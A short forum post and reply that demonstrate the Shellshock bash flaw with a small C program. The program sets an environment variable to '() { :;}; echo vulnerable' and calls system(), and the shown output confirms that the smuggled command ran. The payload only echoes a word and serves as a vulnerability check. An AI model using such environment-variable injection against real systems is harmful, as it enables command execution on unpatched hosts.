undefined | Better HN

story

0 pointschappar11y ago0 comments

Here is a simple c program to demonstrate this.

#include<stdio.h>

#include <stdlib.h>

int main()

{

   setenv("VAR", "() { :;}; echo vulnerable", 0);
   system("ls");

}

#./a.out

vulnerable

a.out

0 comments

That's awesome.

Does system() invoke /bin/sh? Does it look for 'sh' on the path? What are the rules?

j / k navigate · click thread line to collapse